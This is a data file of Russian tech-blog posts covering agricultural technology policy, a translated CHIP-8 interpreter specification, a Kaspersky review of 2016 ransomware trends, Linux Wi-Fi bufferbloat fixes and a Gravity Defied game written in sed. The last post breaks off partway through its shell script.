Основой мотивации для внедрения высоких технологий в сельском хозяйстве является низкая производительность труда в секторе (по этому показателю РФ отстает в 3-5 раз от стран Европы и США). Опыт зарубежных же аграриев показывает, что использование высокотехнологичных решений позволяет повысить данный показатель и, соответственно, снизить себестоимость продукции.
Оптимизации подвергнутся системы хранения и первичной переработки сельхозпродукции. Замдиректора Фонда развития интернет-инициатив Сергей Скрипников отмечает, что это позволит не только повысить конкурентоспособность отечественных аграриев, но и поможет минимизировать использование химикатов и лучше бороться с воровством.
Для работников в поле планируется разработать и внедрить специальные информационные системы и сервисы. При помощи спутниковой съемки и публикации в интернете проанализированных данных, аграрии получат информацию о состоянии сельхозугодий и их эффективности. Также планируется реализовать систему по управлению климатическими рисками. Данные о погоде будут сниматься с метеостанций и радиолокаторов Росгидромета. Вся перечисленная информация будет находиться в свободном доступе на государственных порталах. Для работы всех вышеперечисленных решений сельхозугодья необходимо обеспечить доступом к интернету.
По статистике проникновение высоких технологий в отечественном агропромышленном комплексе составляет всего лишь 5-10%. При этом представитель Минсельхоза рассматривает эту цифру в положительном свете с мотивацией, что «работа пошла».
В этом году Российская Федерация впервые в новейшей истории стала крупнейшим экспортером пшеницы в мире. Основной причиной этому, однако, стала не оптимизация производства, а низкая цена на нефть и рекордный по объемам урожай. При этом на территории России находится 9-10% всех пахотных земель планеты.
В какие сроки и за чей счет будут реализовываться вышеуказанные проекты пока не уточняется. | https://geektimes.ru/post/283710/ |
habrahabr | Собственная платформа. Часть 0.2 Теория. Интерпретатор CHIP8 | ['chip-8', 'interpreter', 'emulator', 'emulation', 'интерпретатор', 'эмулятор', 'эмуляция'] | Введение
Здравствуй, мир! Сегодня у нас перевод спецификации языка CHIP8. Это статья содержит только теоретическую часть.
*COSMAC ELF во всей красе*
Что такое CHIP8?
CHIP8 это интерпретируемый... | Введение Здравствуй, мир! Сегодня у нас перевод спецификации языка CHIP8. Это статья содержит только теоретическую часть. *COSMAC ELF во всей красе* Что такое CHIP8? CHIP8 это интерпретируемый язык программирования, который был разработан Джозефом Вейзбекером (прим. перевод Joseph Weisbecker) в семидесятых для использования в RCA COSMAC VIP . В дальнейшем был использован в COSMAC ELF , Telmac 1800 , ETI 660, DREAM 6800. Тридцать одна (35?) инструкция давали возможности для вывода простого звука, монохромной графики в разрешении 64 на 32 пикселя, а также позволяло использовать 16 пользовательских кнопок. Сегодня CHIP-8 часто используется для обучения базовым навыком эмуляции (не интерпретации). Интерпретаторы CHIP-8, часто по ошибке называемые „эмуляторами“, существуют на все более расширяющемся множестве платформ. Это обилие интерпретаторов связано со сходством дизайна интерпретатора CHIP-8 и эмулятора системы. Те, кто хочет разобраться в эмуляторах, нередко начинают с написания интерпретатора CHIP-8. Из-за его простоты большое количество игр и программ были написаны на CHIP-8. Это доказывает, что программист часто не ограничен языком программирования. Инструкции CHIP-8 хранились напрямую в памяти. Современные компьютеры позволяют хранить бинарные данные без надобности вводить их вручную в память. Спецификация COSMAC VIP предполагает, что код загружается в памяти со смещением в 512 байтов (0x200). Большинство игр и программ в CHIP-8 во время работы с памятью предполагают именно такое смещение. Надо отметить, что программы в памяти CHIP-8 хранятся в Big-Endian, предполагая хранение MSB First (Most Significant Byte First — Самый "значимый" байт храниться первым). Инструкции исполняются по два байта последовательно если не было иных инструкций. Так как инструкции CHIP-8 содержат указатели на данные или инструкции в памяти изменение кода требовало бы изменения адреса в инструкциях. К счастью псевдо-ассемблер решает эту проблему. Большое количество документации к CHIP-8 не содержат описания некоторый инструкций (8XY3, 8XY6, 8XY7 и 8XYE), но будут описаны здесь. Архитектура GPR General Purpose Registers (РОН — Регистры общего назначения) Все арифметические операции используют регистры. В CHIP-8 описаны 16 регистров. Все регистры без знаковые, 8-и битные и могут использоваться в инструкциях принимающие регистры общего назначения в качестве аргумента, но стоит помнить, что некоторые инструкции могут модифицировать последний регистр (V[0xF]) (Регистр переполнения). Псевдокод: u8 V[16] <= 0; Не совершайте моих ошибок: Последний регистр это полноценный 8-и битный регистр, несмотря на использование как спец регистр в некоторых инструкциях. Хотя спецификация рекомендует не использовать последний регистр в операциях. I (Регистр) Регистр I это 16-битный регистр. Несмотря на это в нем используется только первые 12 бит. Псевдокод: u16 I <= 0; Упущение в спецификации: Что будет если произойдет переполнение? PC (Регистр) Регистр PC это аналогичный регистру I, только указывает на инструкции.
Упущение в спецификации: Что будет если произойдет переполнение? Стек В CHIP-8 Описан стек глубиной 12 ячеек. Прямого доступа к стеку нету (PUSH/POP/etc), но есть инструкции вызова и возврата, которые используют стек.
NOTE: Тут Указанно 16 ячеек. А тут — 12. Инструкции Все инструкции это шестнадцатеричная запись.
Обозначения смотрите в таблице: NNN: Адрес
NN: 8-и битная константа.
N: 4-х битная константа.
X and Y: Регистры
PC: Program Counter (Счетчик команд?)
I: 16-и битный указатель (регистр?)
Регистры и арифметика 6XNN — Загрузить в регистр константу.
Самая простая инструкция для регистров это 6XNN (шестнадцатеричная запись). Где X это регистр, а NN это константа загружаемая в регистр. Например 6ABB — Загрузить в регистр под номером 10 (V[0xA], регистров 16 от нуля до пятнадцати) значение BB (187). Псевдокод: V[X] <= 0xNN 7XNN — Добавить константу к регистру (ADDI)
Добавляет константу NN к регистру под номером X и сохраняет в регистре под номером X. Не меняет регистр переполнения. V[X] <= V[X] + NN 8XY0 — Сохранить регистр в другой регистр (MOV)
Еще одна инструкция работающая с регистрами. Имеет запись 8XY0 . Где X это номер регистра куда будет скопирован регистр под номером Y. Псевдокод: V[X] <= V[Y] 8XY4 — Сложить два регистра (ADD)
Добавляет значение регистра под номером Y к регистру X и сохраняет значение в регистр X. Если переполнение произошло регистр переполнения будет установлено в значение 1. Если переполнения не произошло регистр переполнения будет сброшен в значение 0. V[X] <= (V[X] + V[Y]) & 0xFF;
V[F] <= (V[X] + V[Y] >= 256); Не совершайте моих ошибок: Регистр переполнения будет модифицирован в любом случае.
Упущение в спецификации: Что будет если регистр X будет регистром переполнения? 8XY5 — Вычесть из регистра (SUB)
Вычитает из регистра под номером X значение регистра Y и если произошло заимствование (прим. перевод Borrow) установить регистр переполнения в 1. И установить регистр переполнения в 0 если заимствование не произошло. 8XY7 — "Обратное" вычитание (SUB)
Установить регистр под номером X в результат вычитания значения регистра X из регистра Y. И если произошло заимствование установить регистр переполнения в 1. И установить регистр переполнения в 0 если заимствование не произошло. 8XY2, 8XY1 и 8XY3 — Логические операции (AND, OR, XOR)
Установить регистр X в результат операции
8XY2 — Логической "И",
8XY1 — Логической "ИЛИ",
8XY3 — Исключающее "ИЛИ"
двух операндов: регистра X и регистра Y. Не модифицирует регистр переполнения.
Не совершайте моих ошибок: Эти операции НЕ МОДИФИЦИРУЮТ регистр переполнения.
NOTE: Здесь нет опечатки. 8XY2 — AND. 8XY1 OR. 8XY3 XOR. 8XY6 — Сдвиг Вправо (Shift Right)
Сохранить в регистр X результат сдвига регистра Y вправо.
Установить регистр переполнения в значение младшего бита регистра Y.
Не совершайте моих ошибок: Результат сдвига регистра Y сохраняется в регистр X, а не в регистр Y. Хотя многие интерпретаторы это правило игнорируют. 8XYE — Сдвиг Влево (Shift Right)
Сохранить старший бит регистра Y в регистр переполнения.
Сохранить результат сдвига регистра Y в регистр X. CXNN — Рандом Случайное число
Установить значение регистра X в результат логической "И" константы NN и рандомного случайного числа. Управления исполнением (Прим. перевод "flow control") 1NNN — Прыжок в NNN
Ставит PC в значение NNN.
Следующая инструкция будет исполнена из адреса NNN BNNN — Прыжок в NNN+V0
Ставит PC в значение NNN+V0.
Следующая инструкция будет исполнена из адреса NNN+V0 2NNN — Вызов функции (Call Subroutine)
Вызывает функции по адресу 2NNN. В стек записывается значение PC + 2. 00EE — Возврат из функции (Return from Subroutine)
Регистр PC будет установлен в значение последнего элемента стека. 3XNN — Пропустить инструкцию, если константа и регистр равны.
Пропускает инструкцию (PC+4) если константа NN и регистр X равны. Иначе не пропускать (PC+2). 5XY0 — Пропустить инструкцию, если оба регистра равны.
Пропускает инструкцию (PC+4) если регистр Y и регистр X равны. Иначе не пропускать (PC+2). 4XNN — Пропустить инструкцию, если константа и регистр не равны.
Пропускает инструкцию (PC+4) если константа NN и регистр X НЕ равны. Иначе не пропускать (PC+2). 9XY0 — Пропустить инструкцию, если регистры не равны.
Пропускает инструкцию (PC+4) если регистр Y и регистр X НЕ равны. Иначе не пропускать (PC+2). Таймеры В CHIP-8 есть два таймера. Один таймер отсчитывает задержку (прим. перевод Delay Timer), другой "Звуковой таймер" (прим. перевод Sound Timer) воспроизводит звук пока значение таймера больше нуля. Оба таймера уменьшают собственные значения с частотой 60Hz (60 раз в секунду). Из таймера задержек можно читать, а из "Звукового таймера" нельзя. FX15 — Установить значение таймера задержек в значения регистра X.
FX07 — Установить значение регистра X в значение таймера задержек.
Здесь все понятно :)
FX18 — Установить значение звукового таймера в значения регистра X.
NOTE: Стоит помнить, что в COSMAC VIP указанно, что значение 1 не даст никакого эффекта. Ввод (Keypad) Для ввода используется 16 кнопок 0-9 и A-F. Упущение в спецификации: Что будет если в кнопки под этим номером не будет. Например:17.
FX0A — Ожидание нажатия. Приостанавливает исполнение до нажатия клавиши указанной в регистре X.
Не совершайте моих ошибок: Не любых нажатий, а только нажатий именно этой клавиши. EX9E — Пропустить следующую инструкцию если кнопка соответствующая значению регистра X нажата.
EXA1 — Пропустить следующую инструкцию если кнопка соответствующая значению регистра X не нажата. Здесь думаю все понятно. Регистр I ANNN — Записать в регистр I значение NNN. FX1E — Добавить значение регистра X к регистру I.
Регистр переполнения будет установлено в 1 если произошло переполнение, иначе в 0. Графика и спрайты NOTE: Графика будет подробно описана в практической части.
DXYN — Нарисовать спрайт. Рисуем спрайт размером N байт (Не нулевое значение) в позиции на экране: (Vx,Vy). Спрайт находиться в памяти по адресу I. Спрайт рисуется логически исключающим ИЛИ (XOR). Если мы перерисовали пиксель (1,1 -> 0) регистр переполнения будет установлен в 1, иначе в 0. Упущение в спецификации: Что будет если N == 0.
Что будет если VX >= 64.
Что будет если VY >= 32.
Где 0,0 или 64,32 и т.д.
Какого цвета пиксели.
NOTE: Чуть больше информации тут .
00E0 — Очистить экран. FX29 — Установить значение I в адрес спрайта для числа указанного в регистре X.
Спрайт храниться в первых 512 байтах. Эта таблица в C: unsigned char chip8_fontset[80] =
{
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
}; Взято отсюда . FX33 — Сохранить значения регистра в двоично десятичном формате в I, I+1 и I+2.
Смотрите: Двоично десятичный код (прим. перевод BCD — Binary-Coded Decimal) Регистры и память FX55 — Сохранить значения регистров V0 до VX включительно в память начиная адреса I.
После выполнения регистр I будет равен I + X + 1. Хотя некоторые интерпретаторы игнорируют это правило. FX65 — Загрузить регистры V0 до VX включительно в значения сохраненный в памяти начиная с адреса I.
После выполнения регистр I будет равен I + X + 1. Хотя некоторые интерпретаторы игнорируют это правило. Все остальное На какой частоте работает интерпретатор? Про это ничего не могу найти в оригинале. Из интернета были получены самые разные частоты: 1000Hz, 840Hz , 540Hz , 500Hz, даже 60Hz. Что будет если прыжок (Jump) будет не выровнен?
Никакой информации об этом я не нашел, но думаю что инструкция будет загружаться и исполняться. Что будет если прочитать или записать из первых 512 байт?
Снова ничего не найдено. Думаю надо отдавать 0 а при записи игнорировать. Конец На этом конец. При опечатках писать в личные сообщения. Буду рад любым замечаниям. Практическая часть находиться в процессе создания. Практическая часть будет на C (не C++) и SDL2. Тут можно найти оригинал. Еще чуть-чуть информации тут . Еще практический туториал тут . | https://habrahabr.ru/post/316788/ |
habrahabr | Трояны-вымогатели — security-тема года | ['kaspersky security bulletin', 'итоги года', 'криптолокеры', 'трояны-вымогатели'] | Каждый год 31 декабря эксперты «Лаборатории Касперского» ходят с друзьями в баню подводят итоги. Итоги года состоят из объективной статистики из нашей облачной системы Kaspersky Security Network, и... | Каждый год 31 декабря эксперты «Лаборатории Касперского» ходят с друзьями в баню подводят итоги. Итоги года состоят из объективной статистики из нашей облачной системы Kaspersky Security Network, и субъективного выбора ключевых событий в сфере безопасности и их оценки. Причем субъективная оценка не менее важна, чем наглядные цифры статистики по разным типам атак. В предсказаниях на 2016 год особое внимание было уделено таргетированным атакам: им наши специалисты дали более высокий приоритет, чем высококлассным атакам с помощью самого совершенного кибероружия. Все дело и в потенциальном ущербе, и в том, что подобрать ключи к защите компании можно, даже и вовсе не пользуясь «вредоносным ПО».
В результате получается, что видов атак может быть великое множество, и оценить их все хором, измерить среднюю температуру «по больнице» не получится. Статистика дает лишь половину понимания ландшафта киберугроз, вторая половина — это опыт специалистов и его приложение к конкретному набору софта, железа и людей в конкретной компании или индустрии. Ежегодный Kaspersky Security Bulletin реализует данную дихотомию в отношении завершающегося отчетного периода.
Как обычно, рекомендую смотреть полный отчет: здесь и здесь . Я же хочу подробно обсудить две ключевые темы: развитие троянов-вымогателей и измерение скорости реакции на инциденты в реальных деньгах. Криптолокеры
Почему тема года? Если оценивать трояны-вымогатели по стандартной шкале сложности или совершенства вредоносного кода, то они вряд ли заслуживают внимания. Большинство криптолокеров чрезвычайно унылы. Они используют обычные и как правило легко блокируемые средства проникновения на компьютер жертвы. Часто это даже не эксплойт, а социальная инженерия. Почему они вообще стали проблемой, которая затрагивает всех, так или иначе? Единственное отличие вымогателей от традиционного вредонсоного ПО — это деньги. Потерять данные страшно, но заражение криптолокером — это либо мгновенная потеря данных, либо быстрая потеря денег. Развитие криптолокеров стало возможно благодаря развитию технологий анонимизации как работы в сети, так и проведения платежей, с помощью криптовалют. В реальном мире вымогательство легко отследить. В виртуальном — весьма затруднительно. Криптолокеры приносят реальные деньги, и развиваются не технологиями, а бизнес-моделью.
В отчете «Лаборатории» хорошо показано, как именно они развиваются. За 2016 год появилось 62 новых семейства троянов-вымогателей, и в разы выросло число модификаций: в январе-марте зафиксировали 2900, в июле-сентябре 32000. Количество атак на бизнес (где информация имеет гораздо большую ценность) выросло в три раза. Top 10 вымогателей, чаще всего атаковавших пользователей в 2016 году.
Да, были вымогатели с интересными техническими решениями. Троян " Петя " не заморачивался с шифрованием отдельных файлов, брал в заложник весь диск целиком. Кампания TeamXRat брутфорсила пароли серверов с дальнейшей установкой трояна без ведома владельца. Вариант трояна Shade анализировал содержимое зараженного компьютера, и в случае обнаружения банковского ПО, переключался в режим шпионажа. Но гораздо больше было уныния, включая копирование текстов с требованием выкупа, выпуск новых троянов, мимикрирующих под старые, ну и, как эталонный пример, индусский троян с ошибками .
А вот с бизнес-моделью все хорошо. В подполье появилась масса партнерских программ, позволяющих стать на скользкую дорожку киберпреступности без особого опыта и знаний.
Для крупного бизнеса криптолокеры никогда не были особой проблемой, а вот для небольших компаний они превратились в реальную головную боль. По нашим данным, 42% малых и средних компаний были атакованы за последний год. 32% жертв заплатили выкуп, из них 20% не получили доступ к данным даже после оплаты.
Ну и главное: с криптолокерами понятно как бороться. С точки зрения технологий защиты это хорошо известная угроза. Проблема достучаться до тех, у кого на защиту не хватает то ли денег, то ли знаний. Здесь есть два способа: коллективные (полиция + эксперты по безопасности) инициативы по расшифровке данных жертв криптолокеров, и более доступное ПО. Например, «Лаборатория» в этом году выпустила бесплатное специализированное решение для борьбы с вымогателями. Стоимость промедления
Вернемся к таргетированным атакам. В отличие от вымогателей, их действительно сложно посчитать общей статистикой: методы взлома всегда разные, нацеленные на конкретные уязвимые точки инфраструктуры, ущерб тоже отличается. В этом году мы опросили представителей бизнеса по всему миру и посчитали некую сферическую стоимость восстановления после кибератаки: получилось чуть меньше 900 тысяч долларов для крупных организаций и 86 тысяч для малого и среднего бизнеса. Таргетированная атака, ожидаемо, обходится дороже, около 1,4 миллиона долларов за инцидент у крупных организаций. Но это средние цифры: конкретно в вашей компании инцидент может «стоить» совершенно по-другому.
Такая общая статистика никак не объясняет эффективность возврата инвестиций. По идее, если компания активно вкладывается в безопасность, она меньше теряет на кибератаках. Это значит, что она сэкономит примерно миллион с каждого успешного инцидента? Не обязательно. Эффективная защита вообще должна оцениваться не по отсутствию кибератак, а скорее по скорости реагирования и масштабу последствий. В ежегодном отчете приводятся как раз такие цифры. Мы разделили опрошенные компании по типичному времени обнаружения инцидентов: от «часов» до «месяцев». И сравнили усредненные показатели стоимости восстановления.
Разница (для крупных компаний) — почти в три раза между «нашли сразу» и «через неделю или больше». Между тем, у семи процентов компаний был как минимум один инцидент, обнаруженный лишь несколько месяцев спустя. Организации, обычно обнаруживающие инциденты скорее поздно, чем рано, чаще всего таки выявляют проблему с помощью внешнего или внутреннего аудита безопасности.
Так вот, скорость обнаружения — она вообще не про количество установленного защитного ПО, не про качество обороны периметра и все остальное. Она — про знания и наличие специалистов, способных эти знания применить. Таргетированные атаки — это пример киберугрозы, которую, да, можно предотвратить. Но надо всегда быть готовым к тому, что успешное проникновение произойдет. В таком случае чем быстрее проблема обнаружится, тем дешевле она обойдется компании — выше показано на сколько.
Кстати, летом мы впервые подняли эту тему с публикации аналогичного сравнения типовых потерь компаний от инцидентов, в зависимости от их способности находить классных специалистов по информационной безопасности. Корреляция, по трем разным вопросам, похожая:
Такой вот перевод специализированных знаний на язык бабла. Хороший аргумент для следующего разговора с начальством о бюджетировании. Криптолокеры в таком контексте выглядят маленькой проблемой, решаемой ограниченным набором хорошо отлаженных инструментов. Беда в том, что современный ландшафт угроз состоит из куда более сложных проблем, часть из них (например, социальная инженерия) вообще плохо решается софтом. Судя по предсказаниям на 2017, влияние нестандартных киберугроз на бизнес будет только расти. | https://habrahabr.ru/company/kaspersky/blog/317644/ |
habrahabr | Wi-Fi на Linux станет быстрее | ['linux kernel', 'wi-fi', 'wireless'] | — пусть лучше небольшая, но фейербаховская...
Виктор Пелевин «Поколение Пи»Недавний релиз ядра Linux 4.9 отличный повод рассказать о предстоящем разгоне WiFi. Сразу оговорюсь — пост не о том, как... | — пусть лучше небольшая, но фейербаховская...
Виктор Пелевин «Поколение Пи» Недавний релиз ядра Linux 4.9 отличный повод рассказать о предстоящем разгоне WiFi. Сразу оговорюсь — пост не о том, как увеличить зону покрытия или менять регуляторные домены . Ничего такого делать не надо, достаточно обновить ядро после того, как патчи буфероборца Dave Täht будут в стабильной ветке. Значительное повышение скорости достигнуто за счет уменьшения задержки [1] и избыточной буферизации [2] в сети. Разработчикам пришлось ради этого перелопатить mac80211 , убрать кое-что сверху, добавить снизу и после этого задержки в сети сократились на порядок. Цена вопроса? Патч в 200 строк. Подробности под катом. Тот самый Bufferbloat Bufferbloat — это излишняя буферизация в сетевом оборудовании провайдера, что приводит к нежеланным задержкам передачи данных. При достаточно загруженном канале каждое соединение отъедает миллисекунды, которые затем превращаются в секунды, а иногда и минуты ожидания. Если сетевая задержка равна 1 секунде, то slashdot.org будет загружаться целых 4 минуты! # flent -l 300 -H server –streams=12 tcp_ndown &
# wget -E -H -k -K -p https://www.slashdot.org
...
FINISHED --2016-10-22 13:43:35--
Total wall clock time: 232.8s
Downloaded: 62 files, 1.8M in 0.9s (77KB/s) Первая команда использует питоновский wrapper для netperf , это мощный инструмент проведения контрольных замеров [3] сетевых подключений. -l 300 #тест длится 5 минут
-H server #подключиться к хосту server
-streams=12 tcp_ndown #12 потоков tcp download Flent загружает канал так, чтобы соединение устанавливалось с секундной задержкой. Установка соединения заняла 99.6% времени исполнения, в результате реальная скорость упала до жалких 77 KB/с. При нулевой задержке та же страница загружается за 8 секунд. Таким образом время кругового пути [4] и задержка имеют большее значение, чем пропускная способность . На стороне провайдера ИБ носит характер эпидемии , но и на пользовательском оборудовании его хватает. Довольно долго каждый сетевой драйвер проектировался с расчетом на нереально высокие потребности буферизации данных, так как разработчики оптимизировали планировщик пакетов для самых высоких скоростей. Однако IRL их редко используют во время WiFi подключения. Вот из-за чего котики загружаются медленно, а видео-звонки превращаются в пытку. Проверьте вашу ИБ без СМС и регистрации. Неприятность в том, что основной bufferbloat на стороне провайдера, исправив ситуацию там, получаешь прирост скорости соединения на халяву. Speedtest ISP Xfinity и Google Fiber . Не сказать, что дело ограничивалось одним лишь нытьем. Начиная с Linux 3.3 вышла целая серия исправлений и оптимизаций направленных на устранение ИБ. Linux 3.3: Byte Queue Limits
Linux 3.4 RED bug fixes & IW10 added & SFQRED
Linux 3.5 Fair/Flow Queuing packet scheduling (fq_codel, codel)
Linux 3.7 TCP small queues (TSQ)
Linux 3.12 TSO/GSO improvements
Linux 3.13 Host FQ + Pacing (sch_fq)
Linux 3.15 Change to microseconds from milliseconds throughout networking kernel
Linux 3.17 Network Batching API
Linux 4.9 BBR (Bottleneck Bandwidth and RTT)
Последний в этой серии исправлений алгоритм BBR. Новость с opennet.ru . В состав ядра включена реализация предложенного компанией Google алгоритма контроля перегрузки TCP (congestion control) — BBR (Bottleneck Bandwidth and RTT), успешно применяемого для увеличения пропускной способности и сокращения задержек передачи данных для трафика с google.com и YouTube. BBR требует внесения изменений только на стороне отправителя, программное обеспечение сетевой инфраструктуры и принимающей стороны остаётся без изменений. Вместо использования потери пакетов как индикатора перегрузки, в BBR применяются методы моделирования канала связи, прогнозирующие имеющуюся пропускную способность через последовательные проверки и оценку времени приема-передачи (RTT), но не доводя до потери пакетов или задержек в передаче. На начальной стадии соединения BBR оценивает потолок пропускной способности канала, затем снижает интенсивность отправки для разгрузки очереди и переходит в режим корректировки, то повышая, то снижая интенсивность отправки, балансируя между максимальной пропускной способностью и незаполненностью очереди пакетов;
Эти изменения затронули почти все сетевые протоколы, однако обошли стороной WiFi и LTE. Так не могло долго продолжаться и за WiFi взялись всерьез. Проект Make WiFi Fast собрал сотни участников во главе с командой ядерных сетевиков. Терминология QDisc или Queuing Discipline — обычный FIFO планировщик, он находится между IP стеком и драйвером.
Планировщик fq_codel не так прост. О нем уже писали на Хабре , поэтому не буду повторяться.
fq_codel — один из самых эффективных и современных алгоритмов, использующий AQM . TXOP — transmit opportunity, попытка отправки.
Как патчами разгоняли WiFi Dave Täht, который уже на раз спасал интернет за последние шесть лет, атаковал проблему с помощью новых и лучших бенчмарков, которые самому же пришлось разрабатывать. Довольно популярный в научной среде и за ее пределами Iperf3 , вообще оказался профнепригодным , так как по умолчанию предполагает нереальные 100 ms ИБ. while( testing)
sleep 100ms
while( total_bytes_sent / total_elapsed_time < target_rate)
transmit buffer of data Так было до патча. Обратите внимание на огромные задержки в > 10 на верхнем и нижнем уровне WiFi стека. QDisc убрали напрочь. Очередь теперь формируется по станциям и продвигается по круговому циклу, a. k. a. Round Robin Fair Queuing.
Буферизация перешла на уровень промежуточного планировщика MAC80211, который управляется со стороны fq_codel . у него минимальный размер, не больше 2 TXOP.
Минимум буферизации в драйвере, самое большое 2 пула TXOP (1.2-10ms): 1 готовый агрегированный фрейм для повторной попытки и еще 1 на подхвате.
MAC80211 больше не складирует пакеты на нижнем уровне драйвера, а отправляет их промежуточному планировщику , докладывает об этом драйверу и тот забирает их по мере поступления. Благодаря этому MAC80211 имеет больше информации о том, когда происходит передача данных. Задержки от буферизации благодаря этому составили всего 2-12 ms. Чего удалось достичь ИБ удалось избыть настолько, что задержки снизились с пиковых значений 1-2 секунд до 40 msec. Наиболее наглядной иллюстрацией будет картинка на которой видны WiFi сессии на 100 рабочих станций до и после патча. До патча, лишь 5 станций успешно стартовали. Чудовищные > 15 секунд тормоза. Кликабельно. После патча, все станции успешно стартовали. Задержки приемлемые 150-300 msec. Кликабельно. Теперь ложка дегтя. Пока лишь драйвера ath9k полностью поддерживают все эти новшества, ath10k уже почти готов. Остальным пока придется подождать, но уверен, остальные драйвера тоже будут активно дорабатываться после того, как патчи попадут в стабильную ветку. Использованные материалы и полезные ссылки Making WiFI Fast
Linux WiFi latencies
Петиция в FCC
Проект Make WiFi Fast.
Queueing in the Linux Network Stack
↑ Latency
↑ Bufferbloat
↑ Benchmark
↑ Round Trip Time
| https://habrahabr.ru/post/317548/ |
habrahabr | Превозмогая трудности: Gravity Defied на sed | ['регулярные выражения', 'gravity defied', 'sed'] | Итак, эта статья посвящается тем, кто любит решать нестандартные задачи на не предназначенных для этого инструментах. Здесь я опишу основные проблемы, с которыми столкнулся во время создания... | Итак, эта статья посвящается тем, кто любит решать нестандартные задачи на не предназначенных для этого инструментах. Здесь я опишу основные проблемы, с которыми столкнулся во время создания аналога игры Gravity defied с использованием потокового текстового редактора (sed). Далее предполагается, что читатель хотя бы немного знаком с синтаксисом sed'ом и и написанием скриптов под bash.
Мирный вечер декабря перестал быть мирным, когда мне пришло сообщение от преподавателя примерно такого содержания: На sed:
Gravity defied
…
Это должно быть круто
Признаться, первые полчаса я сидел с мыслью о том, как это вообще возможно. Но потом мне удалось взять себя в руки и я начал разбираться.
Попытки гуглить на тему игр на sed привели к арканоиду и сокобану .
Прежде, чем мы начнём разбор проблем, хочу поделиться репозиторием с проектом и видео-демонстрацией результата
Итак, Проблема первая: представление в памяти sed должен как-то хранить текущее состояние игры. В нашем распоряжении два места для магии hold space и pattern space .
Hold space будет хранить состояние игры между итерациями (итерацией я буду называть обработку одного входящего символа), а в pattern space мы будем изменять состояние игры.
Алгоритм примерно такой: Переходим к действию, которое привязано к символу, который мы получили на вход
Записываем в pattern space содержимое hold space
Изменяем содержимое pattern space в соотвествии с логикой действия
Записываем содержимое pattern space в hold space
Производим наложение эффектов на pattern space (на этом шаге мы из нашего «служебного» состояния игры в то, что будет видеть пользователь)
Выводим содержимое pattern space на экран
Повторить с п.1 для каждого введённого символа
Для упрощения разбора введённого текста примем на веру, что из всей входящей строки лишь первый символ нам важен.
Первым делом — инициализация. Создадим метку print, которая будет создавать поле игры в начальный момент времени. С момента запуска игры лишь один раз возникнет ситуация, когда на вход sed'у передаётся пустая строка: самый старт игры.
Таким образом, /^$/b print
...
:print
# Начало любого действия, которое иницируется извне
g
s/.*/\
+-----------------------+\
|BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB1\
|BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB2\
|BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB3\
|BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB4\
|BBBBBBBBBBBBBBBBBBBBBUPPABBBBBBBBBBBB5\
|BBBBBBBBBBBBBBBBBBBBUBBBABBBBBAPPPPPP6\
|DBBBBBBBBBBBBBBBBBUPBBBBABBBBBABBBBBB7\
|BDBSBFBBBBBBBBBBBUBBBBBBABBBBBABBBBBB8\
|BBPPPPPPPPPPPPPPPBBBBBBBPPPPPPPBBBBBB9\
+-----------------------+\
b end
На этом этапе всё зависит от вашего воображения. Вы сами решаете, за что отвечает каждый символ. У меня B — это пустое место, F и S — колёса байка, в A, D, P, U — дорога (четыре вида, для красоты, но об этом — позднее).
Нам необходимо вывести всё полученное на экран. Как вы могли заметить, в конце print мы переходим к метке end.
end — это общее завершение любого действия. :end
# Сохраняем все изменения в hold space
h
# Здесь позднее провернём всю пост-обработку нашего игрового пространства
# Отправляем символ очистки экрана
i\
^[[H
# Печатаем содержимое pattern space на экран
p
Примечание: ^[[H не стоит копипастить, это escape-последовательность. Например, в vim она вводится так: Ctrl+V Ctrl+ESC [ H
Запустим наш скрипт с помощью sed -nf gravity.sed . Поздравляю с статической картинкой!
Когда у нас есть поле, достаточно просто написать команды, которые будут двигать влево-вправо наши импровизированные колёса: s/FB/BF/
s/SB/BS/
Движение вверх чуть сложнее но мы же не боимся сложностей, правда? s/B(.{39})F)/F\1B/
Тут вся суть в цифре 39. Это количество символов в строке.
Добавляем пару меток и «привязываем» их к нужным клавишам, и вуаля, у нас есть некий абстрактный байк (ладно, два колеса), для которого не существует границ и физики. Но если вы захотите писать лабиринт, то вам как раз это и нужно.
Проверить игру не сложно, но нажимать Enter после каждого введённого символа — удовольствие ниже среднего, так что нужно автоматизировать этот процесс. Проблема вторая: тактование
Так как «сердце» игры — sed, нужна оболочка, которая за нас будет нажимать enter каждый раз, когда мы нажали кнопку. Бесконечный цикл — самое оно.
Примерный код: (while true
do
read -s -n 1 key # считываем одно нажатие клавиши без вывода на экран в переменную key
echo $key
done) | sed ...
Игра теперь будет станет чуть более радостной, но в ней всё ещё есть большой недочёт: игрок может влиять на ход времени. Чем быстрее тыкает игрок по клавишам, тем быстрее ход игры. Нас такое не устраивает, поэтому нужно тактование . Теперь у нас два источника данных — тактовый генератор и пользователь. Самое простое решение, которое приходит в голову — воспользоваться ключом -t у read. Если пользователь ничего не введёт за указанное кол-во секунд, то read не станет блокировать скрипт. Это решение меня не устроило: на SunOS read отказывался принимать дробное количество секунд, а динамичная игра с одним кадром в секунду — это как-то странно. Второе решение — использовать именнованый pipe: # Удаляем (на всякий случай) pipe и создаём новый
rm -f gravity-fifo;
mkfifo gravity-fifo;
# Эта строчка будет держать pipe открытым достаточно долго
sleep 99999999 > gravity-fifo &
# Запустим игру
sed -nf gravity.sed gravity-fifo &
# Тактовый генератор, который раз в $TIME * 10^-6 секунд будет записывать символ t в pipe
while true
do
echo t > gravity-fifo
usleep $TIME
done &
# Пользовательский ввод
